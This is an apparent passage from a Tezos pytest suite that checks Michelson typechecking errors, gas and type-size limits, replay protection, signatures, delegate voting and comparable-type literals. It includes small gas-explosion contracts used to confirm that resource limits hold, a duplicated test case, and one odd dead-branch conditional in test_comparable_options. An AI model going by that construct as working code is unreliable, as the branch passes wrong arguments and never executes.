        [
            # operations cannot be PACKed
            (
                "pack_operation.tz",
                r'operation type forbidden in parameter, storage and constants',
            ),
            # big_maps cannot be PACKed
            (
                "pack_big_map.tz",
                r'big_map or sapling_state type not expected here',
            ),
            (
                "invalid_self_entrypoint.tz",
                r'Contract has no entrypoint named D',
            ),
            ("contract_annotation_default.tz", r'unexpected annotation'),
            # Missing field
            (
                "missing_only_storage_field.tz",
                r'Missing contract field: storage',
            ),
            ("missing_only_code_field.tz", r'Missing contract field: code'),
            (
                "missing_only_parameter_field.tz",
                r'Missing contract field: parameter',
            ),
            (
                "missing_parameter_and_storage_fields.tz",
                r'Missing contract field: parameter',
            ),
            # Duplicated field
            (
                "multiple_parameter_field.tz",
                r'duplicate contract field: parameter',
            ),
            ("multiple_code_field.tz", r'duplicate contract field: code'),
            ("multiple_storage_field.tz", r'duplicate contract field: storage'),
            # The first duplicated field is reported, storage in this case
            (
                "multiple_storage_and_code_fields.tz",
                r'duplicate contract field: storage',
            ),
            # error message for set update on non-comparable type
            (
                "set_update_non_comparable.tz",
                r'Type nat is not compatible with type list operation',
            ),
            # error message for the arity of the chain_id type
            (
                "chain_id_arity.tz",
                r'primitive chain_id expects 0 arguments but is given 1',
            ),
            # error message for DIP over the limit
            ("big_dip.tz", r'expected a positive 10-bit integer'),
            # error message for DROP over the limit
            ("big_drop.tz", r'expected a positive 10-bit integer'),
            # error message for set update on non-comparable type
            # NOTE(review): duplicate of the identical entry above —
            # pytest will generate and run this case twice.
            (
                "set_update_non_comparable.tz",
                r'Type nat is not compatible with type list operation',
            ),
            # error message for attempting to push a value of type never
            ("never_literal.tz", r'type never has no inhabitant.'),
            # field annotation mismatch with UNPAIR
            (
                "unpair_field_annotation_mismatch.tz",
                r'The field access annotation does not match',
            ),
            # COMB, UNCOMB, and DUP cannot take 0 as argument
            ("comb0.tz", r"PAIR expects an argument of at least 2"),
            ("comb1.tz", r"PAIR expects an argument of at least 2"),
            ("uncomb0.tz", r"UNPAIR expects an argument of at least 2"),
            ("uncomb1.tz", r"UNPAIR expects an argument of at least 2"),
            ("dup0.tz", r"DUP n expects an argument of at least 1"),
            (
                "push_big_map_with_id_with_parens.tz",
                r"big_map or sapling_state type not expected here",
            ),
            (
                "push_big_map_with_id_without_parens.tz",
                r"primitive PUSH expects 2 arguments but is given 4",
            ),
            # sapling_state is not packable
            (
                "pack_sapling_state.tz",
                r"big_map or sapling_state type not expected here",
            ),
            # sapling_state is not packable
            (
                "unpack_sapling_state.tz",
                r"big_map or sapling_state type not expected here",
            ),
            # Ticket duplication attempt
            ("ticket_dup.tz", r'DUP used on the non-dupable type ticket nat'),
            # error message for ticket unpack
            ("ticket_unpack.tz", r'Ticket in unauthorized position'),
            # error message for attempting to use APPLY to capture a ticket
            ("ticket_apply.tz", r'Ticket in unauthorized position'),
            # error message for attempting to wrap a ticket in a ticket
            (
                "ticket_in_ticket.tz",
                r'comparable type expected.Type ticket unit is not comparable',
            ),
        ],
    )
    def test_ill_typecheck(self, client: Client, contract, error_pattern):
        """Each ill-typed contract fails with its expected message."""
        with utils.assert_run_failure(error_pattern):
            client.typecheck(os.path.join(ILLTYPED_CONTRACT_PATH, contract))

    def test_zero_transfer_to_implicit_contract(self, client):
        """A 0-tez transfer to an implicit (code-less) account fails."""
        pubkey = IDENTITIES['bootstrap3']['identity']
        err = (
            'Transaction of 0ꜩ towards a contract without code are '
            rf'forbidden \({pubkey}\).'
        )
        with utils.assert_run_failure(err):
            client.transfer(0, 'bootstrap2', 'bootstrap3', [])

    def test_zero_transfer_to_nonexistent_contract(self, client):
        """A 0-tez transfer to a nonexistent KT1 address fails."""
        nonexistent = "KT1Fcq4inD44aMhmUiTEHR1QMQwJT7p2u641"
        err = rf'Contract {nonexistent} does not exist'
        with utils.assert_run_failure(err):
            client.transfer(0, 'bootstrap2', nonexistent, [])
# A Michelson script where each `DUP ; PAIR` doubles the size of the
# value (and of its type) on the stack; even typechecking it consumes a
# very large amount of gas.
FIRST_EXPLOSION = '''
{ parameter unit;
storage unit;
code{ DROP; PUSH nat 0 ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DROP ; UNIT ; NIL operation ; PAIR} }
'''
# FIRST_EXPLOSION costs a large amount of gas just for typechecking.
# FIRST_EXPLOSION_BIGTYPE type size exceeds the protocol set bound.
FIRST_EXPLOSION_BIGTYPE = '''
{ parameter unit;
storage unit;
code{ DROP; PUSH nat 0 ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DROP ; UNIT ; NIL operation ; PAIR} }
'''
# A script that builds nested lists from its input; run on a large
# enough input, serializing the resulting storage becomes expensive
# (used by TestGasBound to exercise the serialization gas bound).
SECOND_EXPLOSION = '''
{ parameter (list int) ;
storage (list (list (list int))) ;
code { CAR ; DIP { NIL (list int) } ;
DUP ; ITER { DROP ; DUP ; DIP { CONS } } ;
DROP ; DIP { NIL (list (list int)) } ;
DUP ; ITER { DROP ; DUP ; DIP { CONS } } ;
DROP ; NIL operation ; PAIR } }
'''
@pytest.mark.contract
class TestGasBound:
    """Gas and serialization limits, plus well-formedness checks on
    Michelson map/set literals."""

    def test_write_contract(self, tmpdir, session: dict):
        """Write the explosion scripts to temp files and record their
        paths in the shared session for the tests below."""
        items = {
            'first_explosion.tz': FIRST_EXPLOSION,
            'first_explosion_bigtype.tz': FIRST_EXPLOSION_BIGTYPE,
            'second_explosion.tz': SECOND_EXPLOSION,
        }.items()
        for name, script in items:
            contract = f'{tmpdir}/{name}'
            with open(contract, 'w') as contract_file:
                contract_file.write(script)
            session[name] = contract

    def test_originate_first_explosion(self, client: Client, session: dict):
        """Originating the explosion script under a tight gas limit
        must fail with a gas-exhaustion error."""
        name = 'first_explosion.tz'
        contract = session[name]
        client.typecheck(contract)
        # -G sets the gas limit; 1870 is deliberately too small.
        args = ['-G', f'{1870}', '--burn-cap', '10']
        expected_error = "Gas limit exceeded during typechecking or execution"
        with utils.assert_run_failure(expected_error):
            client.originate(f'{name}', 0, 'bootstrap1', contract, args)

    def test_originate_big_type(self, client: Client, session: dict):
        """A script whose type grows past the protocol's maximum type
        size is rejected at typechecking."""
        name = 'first_explosion_bigtype.tz'
        contract = session[name]
        # We could not be bothered with finding how to escape parentheses
        # so we put dots
        expected_error = "type size .1023. exceeded maximum type size .1000."
        with utils.assert_run_failure(expected_error):
            client.typecheck(contract)

    def test_originate_second_explosion(self, client: Client, session: dict):
        """second_explosion.tz runs fine on a moderate-size input."""
        name = 'second_explosion.tz'
        contract = session[name]
        storage = '{}'
        inp = '{1;2;3;4;5;6;7;8;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1}'
        client.run_script(contract, storage, inp)

    def test_originate_second_explosion_fail(
        self, client: Client, session: dict
    ):
        """With a larger input and a fixed gas budget, serializing the
        resulting storage must exhaust the provided gas."""
        name = 'second_explosion.tz'
        contract = session[name]
        storage = '{}'
        inp = (
            '{1;2;3;4;5;6;7;8;9;0;1;2;3;4;5;6;7;1;1;1;1;1;1;1;1;1;1;1'
            + ';1;1;1;1;1;1;1;1;1;1;1;1;1;1}'
        )
        expected_error = (
            "Cannot serialize the resulting storage"
            + " value within the provided gas bounds."
        )
        with utils.assert_run_failure(expected_error):
            client.run_script(contract, storage, inp, gas=9290)

    def test_typecheck_map_dup_key(self, client: Client):
        """Map literals with duplicate keys are rejected."""
        expected_error = (
            'Map literals cannot contain duplicate'
            + ' keys, however a duplicate key was found'
        )
        with utils.assert_run_failure(expected_error):
            client.typecheck_data('{ Elt 0 1 ; Elt 0 1}', '(map nat nat)')

    def test_typecheck_map_bad_ordering(self, client: Client):
        """Map literal keys must be in strictly ascending order."""
        expected_error = (
            "Keys in a map literal must be in strictly"
            + " ascending order, but they were unordered in literal"
        )
        with utils.assert_run_failure(expected_error):
            client.typecheck_data(
                '{ Elt 0 1 ; Elt 10 1 ; Elt 5 1 }', '(map nat nat)'
            )

    def test_typecheck_set_bad_ordering(self, client: Client):
        """Set literal values must be in strictly ascending order."""
        expected_error = (
            "Values in a set literal must be in strictly"
            + " ascending order, but they were unordered in literal"
        )
        with utils.assert_run_failure(expected_error):
            client.typecheck_data('{ "A" ; "C" ; "B" }', '(set string)')

    def test_typecheck_set_no_duplicates(self, client: Client):
        """Set literals with duplicate values are rejected."""
        expected_error = (
            "Set literals cannot contain duplicate values,"
            + " however a duplicate value was found"
        )
        with utils.assert_run_failure(expected_error):
            client.typecheck_data('{ "A" ; "B" ; "B" }', '(set string)')
@pytest.mark.contract
class TestChainId:
    """The CHAIN_ID opcode and its use for replay protection."""

    def test_chain_id_opcode(self, client: Client, session: dict):
        """Originate and call the chain_id opcode test contract."""
        script = os.path.join(CONTRACT_PATH, 'opcodes', 'chain_id.tz')
        originate(client, session, script, 'Unit', 0)
        client.call('bootstrap2', "chain_id", [])
        utils.bake(client, 'bootstrap5')

    def test_chain_id_authentication_origination(self, client: Client, session):
        """Originate the authentication contract bound to bootstrap1's
        public key, with a 1000 tez balance and counter 0."""
        script = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'authentication.tz'
        )
        public_key = IDENTITIES['bootstrap1']['public']
        originate(client, session, script, f'Pair 0 "{public_key}"', 1000)
        utils.bake(client, 'bootstrap5')

    def test_chain_id_authentication_first_run(
        self, client: Client, session: dict
    ):
        """Sign (chain_id, contract, lambda, counter) with bootstrap1's
        key and call the authentication contract with that signature."""
        target = IDENTITIES['bootstrap2']['identity']
        # Lambda transferring 1000 mutez to the target account.
        operation = (
            '{DROP; NIL operation; '
            + f'PUSH address "{target}"; '
            + 'CONTRACT unit; ASSERT_SOME; PUSH mutez 1000; UNIT; '
            + 'TRANSFER_TOKENS; CONS}'
        )
        chain_id = client.rpc('get', 'chains/main/chain_id')
        contract_address = session['contract']
        packed = client.pack(
            f'Pair (Pair "{chain_id}" "{contract_address}") '
            + f'(Pair {operation} 0)',
            'pair (pair chain_id address)'
            + '(pair (lambda unit (list operation)) nat)',
        )
        signature = client.sign_bytes_of_string(packed, "bootstrap1")
        client.call(
            'bootstrap2',
            'authentication',
            ['--arg', f'Pair {operation} \"{signature}\"'],
        )
        utils.bake(client, 'bootstrap5')
@pytest.mark.contract
class TestBigMapToSelf:
    """A contract that passes its own big_map back to itself."""

    def test_big_map_to_self_origination(self, client: Client, session: dict):
        """Originate big_map_to_self.tz with an empty big_map."""
        script = os.path.join(CONTRACT_PATH, 'opcodes', 'big_map_to_self.tz')
        originate(client, session, script, '{}', 0)
        utils.bake(client, 'bootstrap5')

    def test_big_map_to_self_transfer(self, client: Client):
        """Trigger the contract via `call`, then via a zero transfer,
        baking after each."""
        for use_call in (True, False):
            if use_call:
                client.call('bootstrap2', "big_map_to_self", [])
            else:
                client.transfer(0, 'bootstrap2', "big_map_to_self", [])
            utils.bake(client, 'bootstrap5')
@pytest.mark.contract
class TestNonRegression:
    """Non-regression checks for previously reported issues."""

    def test_issue_242_originate(self, client: Client, session: dict):
        """Originate the bug_262 reproduction contract with 1 tez."""
        script = os.path.join(CONTRACT_PATH, 'non_regression', 'bug_262.tz')
        originate(client, session, script, 'Unit', 1)

    def test_issue_242_assert_balance(self, client: Client):
        """The contract's balance must still be exactly 1 tez."""
        assert client.get_balance('bug_262') == 1
@pytest.mark.contract
class TestMiniScenarios:
    """End-to-end mini scenarios: replay protection, CREATE_CONTRACT,
    default accounts, signature verification, delegation voting and
    entrypoint resolution."""

    # replay.tz related tests
    def test_replay_originate(self, client: Client, session: dict):
        """Originate the replay-protection test contract."""
        path = os.path.join(CONTRACT_PATH, 'mini_scenarios', 'replay.tz')
        originate(client, session, path, 'Unit', 0)

    def test_replay_transfer_fail(self, client: Client):
        """An internal-operation replay must be detected and refused."""
        with utils.assert_run_failure("Internal operation replay attempt"):
            client.transfer(10, "bootstrap1", "replay", [])

    # create_contract.tz related tests
    def test_create_contract_originate(self, client: Client, session: dict):
        """Originate the CREATE_CONTRACT test contract with 1000 tez."""
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'create_contract.tz'
        )
        originate(client, session, path, 'Unit', 1000)

    def test_create_contract_balance(self, client: Client):
        """The contract still holds its initial 1000 tez."""
        assert client.get_balance('create_contract') == 1000

    def test_create_contract_perform_creation(self, client: Client):
        """Calling the contract spawns a child contract credited with
        100 tez and storage "abcdefg"."""
        transfer_result = client.transfer(
            0,
            "bootstrap1",
            "create_contract",
            ['-arg', 'None', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        # The new KT1 address is only reported in the client output.
        pattern = r"New contract (\w*) originated"
        match = re.search(pattern, transfer_result.client_output)
        assert match is not None
        kt_1 = match.groups()[0]
        assert client.get_storage(kt_1) == '"abcdefg"'
        assert client.get_balance(kt_1) == 100
        assert client.get_balance('create_contract') == 900

    # Originates a contract that when called, creates a contract with a
    # rootname annotation. Such annotations comes in two flavors, thus the
    # parameterization. Then calls the first contract and verifies the
    # existence and type of the root entrypoint of the create contract.
    @pytest.mark.parametrize(
        "contract",
        [
            'create_contract_rootname.tz',
            'create_contract_rootname_alt.tz',
        ],
    )
    def test_create_contract_rootname_originate(
        self, client: Client, session: dict, contract
    ):
        """Either flavor of rootname annotation must yield a child
        contract exposing a %root entrypoint of type unit."""
        path = os.path.join(CONTRACT_PATH, 'opcodes', contract)
        origination_res = originate(client, session, path, 'None', 1000)
        transfer_result = client.transfer(
            0,
            "bootstrap1",
            origination_res.contract,
            ['-arg', 'Unit', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        pattern = r"New contract (\w*) originated"
        match = re.search(pattern, transfer_result.client_output)
        assert match is not None
        kt_1 = match.groups()[0]
        entrypoint_type = client.get_contract_entrypoint_type(
            'root', kt_1
        ).entrypoint_type
        # Fix: the original message read "...should existwith type unit"
        # (missing space in the implicit string concatenation) and named
        # 'my_root' although the entrypoint queried above is 'root'.
        assert entrypoint_type == 'unit', (
            'the entrypoint root of the originated contract should exist '
            'with type unit'
        )

    # default_account.tz related tests
    def test_default_account_originate(self, client: Client, session: dict):
        """Originate the default_account contract with 1000 tez."""
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'default_account.tz'
        )
        originate(client, session, path, 'Unit', 1000)

    def test_default_account_transfer_then_bake(self, client: Client):
        """The contract credits 100 tez to the implicit account whose
        address it receives — including a fresh, unrevealed account."""
        tz1 = IDENTITIES['bootstrap4']['identity']
        client.transfer(
            0,
            "bootstrap1",
            "default_account",
            ['-arg', f'"{tz1}"', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        account = 'tz1SuakBpFdG9b4twyfrSMqZzruxhpMeSrE5'
        client.transfer(
            0,
            "bootstrap1",
            "default_account",
            ['-arg', f'"{account}"', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        assert client.get_balance(account) == 100

    # Test bytes, SHA256, CHECK_SIGNATURE
    def test_reveal_signed_preimage_originate(
        self, client: Client, session: dict
    ):
        """Originate reveal_signed_preimage.tz with a (hash, key) pair
        as storage."""
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'reveal_signed_preimage.tz'
        )
        byt = (
            '0x9995c2ef7bcc7ae3bd15bdd9b02'
            + 'dc6e877c27b26732340d641a4cbc6524813bb'
        )
        sign = 'p2pk66uq221795tFxT7jfNmXtBMdjMf6RAaxRTwv1dbuSHbH6yfqGwz'
        storage = f'(Pair {byt} "{sign}")'
        originate(client, session, path, storage, 1000)

    def test_wrong_preimage(self, client: Client):
        """A wrong preimage must fail the contract's hash comparison."""
        byt = (
            '0x050100000027566f756c657a2d766f75732'
            + '0636f75636865722061766563206d6f692c20636520736f6972'
        )
        sign = (
            'p2sigvgDSBnN1bUsfwyMvqpJA1cFhE5s5oi7SetJ'
            + 'VQ6LJsbFrU2idPvnvwJhf5v9DhM9ZTX1euS9DgWozVw6BTHiK9VcQVpAU8'
        )
        arg = f'(Pair {byt} "{sign}")'
        # We check failure of ASSERT_CMPEQ in the script.
        with utils.assert_run_failure("At line 8 characters 9 to 21"):
            client.transfer(
                0,
                "bootstrap1",
                "reveal_signed_preimage",
                ['-arg', arg, '--burn-cap', '10'],
            )

    def test_wrong_signature(self, client: Client):
        """A correct preimage with a bad signature must be refused."""
        byt = (
            '0x050100000027566f756c657a2d766f757320636'
            + 'f75636865722061766563206d6f692c20636520736f6972203f'
        )
        sign = (
            'p2sigvgDSBnN1bUsfwyMvqpJA1cFhE5s5oi7SetJVQ6'
            + 'LJsbFrU2idPvnvwJhf5v9DhM9ZTX1euS9DgWozVw6BTHiK9VcQVpAU8'
        )
        arg = f'(Pair {byt} "{sign}")'
        # We check failure of CHECK_SIGNATURE ; ASSERT in the script.
        with utils.assert_run_failure("At line 15 characters 9 to 15"):
            client.transfer(
                0,
                "bootstrap1",
                "reveal_signed_preimage",
                ['-arg', arg, '--burn-cap', '10'],
            )

    def test_good_preimage_and_signature(self, client: Client):
        """The correct preimage with a valid signature succeeds."""
        byt = (
            '0x050100000027566f756c657a2d766f757320636f7563'
            + '6865722061766563206d6f692c20636520736f6972203f'
        )
        sign = (
            'p2sigsceCzcDw2AeYDzUonj4JT341WC9Px4wdhHBxbZcG1F'
            + 'hfqFVuG7f2fGCzrEHSAZgrsrQWpxduDPk9qZRgrpzwJnSHC3gZJ'
        )
        arg = f'(Pair {byt} "{sign}")'
        client.transfer(
            0,
            "bootstrap1",
            "reveal_signed_preimage",
            ['-arg', arg, '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')

    # Test vote_for_delegate
    def test_vote_for_delegate_originate(self, client: Client, session: dict):
        """Originate vote_for_delegate.tz with bootstrap3/bootstrap4 as
        the two voters, both with no vote yet."""
        b_3 = IDENTITIES['bootstrap3']['identity']
        b_4 = IDENTITIES['bootstrap4']['identity']
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'vote_for_delegate.tz'
        )
        storage = f'''(Pair (Pair "{b_3}" None) (Pair "{b_4}" None))'''
        originate(client, session, path, storage, 1000)
        assert client.get_delegate('vote_for_delegate').delegate is None

    def test_vote_for_delegate_wrong_identity1(self, client: Client):
        """A non-voter (bootstrap1) cannot vote."""
        # We check failure of CHECK_SIGNATURE ; ASSERT in the script.
        with utils.assert_run_failure("At line 15 characters 57 to 61"):
            client.transfer(
                0,
                "bootstrap1",
                "vote_for_delegate",
                ['-arg', 'None', '--burn-cap', '10'],
            )

    def test_vote_for_delegate_wrong_identity2(self, client: Client):
        """A non-voter (bootstrap2) cannot vote."""
        # We check failure of CHECK_SIGNATURE ; ASSERT in the script.
        with utils.assert_run_failure("At line 15 characters 57 to 61"):
            client.transfer(
                0,
                "bootstrap2",
                "vote_for_delegate",
                ['-arg', 'None', '--burn-cap', '10'],
            )

    def test_vote_for_delegate_b3_vote_for_b5(self, client: Client):
        """bootstrap3 votes for bootstrap5; the vote is recorded."""
        b_5 = IDENTITIES['bootstrap5']['identity']
        client.transfer(
            0,
            "bootstrap3",
            "vote_for_delegate",
            ['-arg', f'(Some "{b_5}")', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        storage = client.get_storage('vote_for_delegate')
        assert re.search(b_5, storage)

    def test_vote_for_delegate_still_no_delegate1(self, client: Client):
        """One vote is not enough: no delegate is set yet."""
        assert client.get_delegate('vote_for_delegate').delegate is None

    def test_vote_for_delegate_b4_vote_for_b2(self, client: Client):
        """bootstrap4 votes for bootstrap2; the vote is recorded."""
        b_2 = IDENTITIES['bootstrap2']['identity']
        client.transfer(
            0,
            "bootstrap4",
            "vote_for_delegate",
            ['-arg', f'(Some "{b_2}")', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        storage = client.get_storage('vote_for_delegate')
        assert re.search(b_2, storage)

    def test_vote_for_delegate_still_no_delegate2(self, client: Client):
        """Disagreeing votes: still no delegate set."""
        assert client.get_delegate('vote_for_delegate').delegate is None

    def test_vote_for_delegate_b4_vote_for_b5(self, client: Client):
        """bootstrap4 switches its vote to bootstrap5."""
        b_5 = IDENTITIES['bootstrap5']['identity']
        client.transfer(
            0,
            "bootstrap4",
            "vote_for_delegate",
            ['-arg', f'(Some "{b_5}")', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        storage = client.get_storage('vote_for_delegate')
        assert re.search(b_5, storage)

    def test_vote_for_delegate_has_delegate(self, client: Client):
        """Both voters agree on bootstrap5: the delegate is now set."""
        b_5 = IDENTITIES['bootstrap5']['identity']
        result = client.get_delegate('vote_for_delegate')
        assert result.delegate == b_5

    def test_multiple_entrypoints_counter(self, session: dict, client: Client):
        """A contract that creates an internal contract and calls it;
        its storage must come back to None at the end."""
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'multiple_entrypoints_counter.tz'
        )
        storage = 'None'
        # originate contract
        originate(client, session, path, storage, 0)
        utils.bake(client, 'bootstrap5')
        # call contract: creates the internal contract and calls it.
        client.transfer(
            0,
            'bootstrap1',
            'multiple_entrypoints_counter',
            ['--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        assert client.get_storage('multiple_entrypoints_counter') == 'None', (
            "The storage of the multiple_entrypoints_counter contract"
            " should be None"
        )

    # Test CONTRACT with/without entrypoint annotation on literal address
    # parameters with/without entrypoint annotation
    def test_originate_simple_entrypoints(self, session: dict, client: Client):
        """Originate simple_entrypoints.tz, used as the target of the
        CONTRACT resolution tests below."""
        contract_target = os.path.join(
            CONTRACT_PATH, 'entrypoints', 'simple_entrypoints.tz'
        )
        originate(client, session, contract_target, 'Unit', 0)
        utils.bake(client, 'bootstrap5')

    @pytest.mark.parametrize(
        'contract_annotation, contract_type, param, expected_storage',
        [
            # tests passing adr to CONTRACT %A unit
            # where adr has an entrypoint %A of type unit, is allowed.
            ('%A', 'unit', '"{adr}"', '(Some "{adr}%A")'),
            ('%B', 'string', '"{adr}"', '(Some "{adr}%B")'),
            ('%C', 'nat', '"{adr}"', '(Some "{adr}%C")'),
            # tests passing adr%A to CONTRACT %A unit: redundant specification
            # of entrypoint not allowed so CONTRACT returns None
            ('%A', 'unit', '"{adr}%A"', 'None'),
            ('%A', 'unit', '"{adr}%B"', 'None'),
            ('%A', 'unit', '"{adr}%D"', 'None'),
            ('%A', 'unit', '"{adr}%A"', 'None'),
            ('%B', 'unit', '"{adr}%A"', 'None'),
            ('%D', 'unit', '"{adr}%A"', 'None'),
            # tests passing adr%A to CONTRACT unit:
            # where adr has an entrypoint %A of type unit, is allowed.
            ('', 'unit', '"{adr}%A"', '(Some "{adr}%A")'),
            ('', 'string', '"{adr}%B"', '(Some "{adr}%B")'),
            ('', 'nat', '"{adr}%C"', '(Some "{adr}%C")'),
            # tests passing adr%B to CONTRACT unit:
            # as entrypoint %B of simple_entrypoints.tz has type string,
            # CONTRACT will return None.
            ('', 'unit', '"{adr}%B"', 'None'),
            # tests passing adr%D to CONTRACT unit:
            # as entrypoint %D does not exist in simple_entrypoints.tz,
            # CONTRACT will return None.
            ('', 'unit', '"{adr}%D"', 'None'),
            # tests passing adr to CONTRACT unit:
            # as adr does not have type unit, CONTRACT returns None.
            ('', 'unit', '"{adr}"', 'None'),
            # entrypoint that does not exist
            ('%D', 'unit', '"{adr}"', 'None'),
            # ill-typed entrypoints
            ('%A', 'int', '"{adr}"', 'None'),
            ('%B', 'unit', '"{adr}"', 'None'),
            ('%C', 'int', '"{adr}"', 'None'),
        ],
    )
    def test_simple_entrypoints(
        self,
        session,
        client,
        contract_annotation,
        contract_type,
        param,
        expected_storage,
    ):
        """Run an ad-hoc script applying CONTRACT (with the given
        annotation and type) to the given address literal, and compare
        the resulting optional address with the expectation."""
        contract = f'''parameter address;
storage (option address);
code {{
       CAR;
       CONTRACT {contract_annotation} {contract_type};
       IF_SOME {{ ADDRESS; SOME }} {{ NONE address; }};
       NIL operation;
       PAIR
     }};'''
        param = param.format(adr=session['contract'])
        expected_storage = expected_storage.format(adr=session['contract'])
        run_script_res = client.run_script(contract, 'None', param, file=False)
        assert run_script_res.storage == expected_storage
@pytest.mark.contract
class TestComparables:
    """Comparability of Michelson types, checked through set/map/big_map
    literals (whose elements must be comparable and strictly ordered)."""

    def test_comparable_unit(self, client: Client):
        """unit is comparable."""
        client.typecheck_data('{}', '(set unit)')
        client.typecheck_data('{Unit}', '(set unit)')

    def test_comparable_options(self, client: Client):
        """option is comparable; None sorts before Some, Some by payload."""
        client.typecheck_data('{}', '(set (option nat))')
        client.typecheck_data('{None; Some 1; Some 2}', '(set (option int))')
        client.typecheck_data(
            client, '{Some "foo"; Some "bar"}', '(set (option string))'
        ) if False else utils.assert_typecheck_data_failure(
            client, '{Some "foo"; Some "bar"}', '(set (option string))'
        )
        utils.assert_typecheck_data_failure(
            client, '{Some Unit; None}', '(set (option unit))'
        )

    def test_comparable_unions(self, client: Client):
        """or is comparable; all Left values sort before all Right."""
        client.typecheck_data('{}', '(set (or unit bool))')
        client.typecheck_data(
            '{Left 3; Left 4; Right "bar"; Right "foo"}',
            '(set (or nat string))',
        )
        utils.assert_typecheck_data_failure(
            client, '{Left 2; Left 1}', '(set (or mutez unit))'
        )
        utils.assert_typecheck_data_failure(
            client, '{Right True; Right False}', '(set (or unit bool))'
        )
        utils.assert_typecheck_data_failure(
            client, '{Right 0; Left 1}', '(set (or nat nat))'
        )

    def test_comparable_pair(self, client: Client):
        # tests that comb pairs are comparable and that the order is the
        # expected one
        client.typecheck_data('{}', '(set (pair nat string))')
        client.typecheck_data('{Pair 0 "foo"}', '(set (pair nat string))')
        client.typecheck_data(
            '{Pair 0 "foo"; Pair 1 "bar"}', '(set (pair nat string))'
        )
        client.typecheck_data(
            '{Pair 0 "bar"; Pair 0 "foo"; \
            Pair 1 "bar"; Pair 1 "foo"}',
            '(set (pair nat string))',
        )
        client.typecheck_data('{}', '(set (pair nat (pair string bytes)))')
        client.typecheck_data('{}', '(map (pair nat string) unit)')
        client.typecheck_data(
            '{Elt (Pair 0 "foo") Unit}', '(map (pair nat string) unit)'
        )
        client.typecheck_data(
            '{Elt (Pair 0 "foo") Unit; \
            Elt (Pair 1 "bar") Unit}',
            '(map (pair nat string) unit)',
        )
        client.typecheck_data(
            '{Elt (Pair 0 "bar") Unit; \
            Elt (Pair 0 "foo") Unit; \
            Elt (Pair 1 "bar") Unit; \
            Elt (Pair 1 "foo") Unit}',
            '(map (pair nat string) unit)',
        )
        client.typecheck_data('{}', '(map (pair nat (pair string bytes)) unit)')
        client.typecheck_data('{}', '(big_map (pair nat string) unit)')
        client.typecheck_data(
            '{Elt (Pair 0 "foo") Unit}', '(big_map (pair nat string) unit)'
        )
        client.typecheck_data(
            '{Elt (Pair 0 "foo") Unit; \
            Elt (Pair 1 "bar") Unit}',
            '(big_map (pair nat string) unit)',
        )
        client.typecheck_data(
            '{Elt (Pair 0 "bar") Unit; \
            Elt (Pair 0 "foo") Unit; \
            Elt (Pair 1 "bar") Unit; \
            Elt (Pair 1 "foo") Unit}',
            '(big_map (pair nat string) unit)',
        )
        client.typecheck_data(
            '{}', '(big_map (pair nat (pair string bytes)) unit)'
        )
        client.typecheck_data('{}', '(set (pair (pair nat nat) nat))')
        client.typecheck_data(
            '{}',
            '(set (pair (pair int nat) \
            (pair bool bytes)))',
        )

    def test_order_of_pairs(self, client: Client):
        # tests that badly-ordered set literals are rejected
        utils.assert_typecheck_data_failure(
            client, '{Pair 0 "foo"; Pair 0 "bar"}', '(set (pair nat string))'
        )
        utils.assert_typecheck_data_failure(
            client, '{Pair 1 "bar"; Pair 0 "foo"}', '(set (pair nat string))'
        )

    def test_comparable_chain_id(self, client: Client):
        """chain_id is comparable; literals must be strictly ordered."""
        client.typecheck_data('{}', '(set chain_id)')
        chain1 = client.rpc('get', 'chains/main/chain_id')
        chain2 = 'NetXZVhNXbDTx5M'
        utils.assert_typecheck_data_failure(
            client,
            '{"' + f'{chain1}' + '"; "' + f'{chain2}' + '"}',
            '(set chain_id)',
        )
        client.typecheck_data(
            '{"' + f'{chain2}' + '"; "' + f'{chain1}' + '"}', '(set chain_id)'
        )

    def test_comparable_signature(self, client: Client):
        """signature is comparable; literals must be strictly ordered."""
        client.typecheck_data('{}', '(set signature)')
        packed = client.pack('Unit', 'unit')
        sig1 = client.sign_bytes_of_string(packed, "bootstrap1")
        sig2 = client.sign_bytes_of_string(packed, "bootstrap2")
        utils.assert_typecheck_data_failure(
            client,
            '{"' + f'{sig1}' + '"; "' + f'{sig2}' + '"}',
            '(set signature)',
        )
        client.typecheck_data(
            '{"' + f'{sig2}' + '"; "' + f'{sig1}' + '"}', '(set signature)'
        )

    def test_comparable_key(self, client: Client):
        """key is comparable; literals must be strictly ordered."""
        pubkey1 = IDENTITIES['bootstrap1']['public']
        pubkey2 = IDENTITIES['bootstrap2']['public']
        client.typecheck_data('{}', '(set key)')
        utils.assert_typecheck_data_failure(
            client,
            '{"' + f'{pubkey1}' + '"; "' + f'{pubkey2}' + '"}',
            '(set key)',
        )
        client.typecheck_data(
            '{"' + f'{pubkey2}' + '"; "' + f'{pubkey1}' + '"}', '(set key)'
        )

    def test_comparable_key_different_schemes(self, client: Client):
        """Keys of different signature schemes compare by scheme first
        (ed25519 < secp256k1 < p256); only that order typechecks."""
        client.gen_key('sk1', ['--sig', 'ed25519'])
        key1 = client.show_address('sk1').public_key
        client.gen_key('sk2', ['--sig', 'secp256k1'])
        key2 = client.show_address('sk2').public_key
        client.gen_key('sk3', ['--sig', 'p256'])
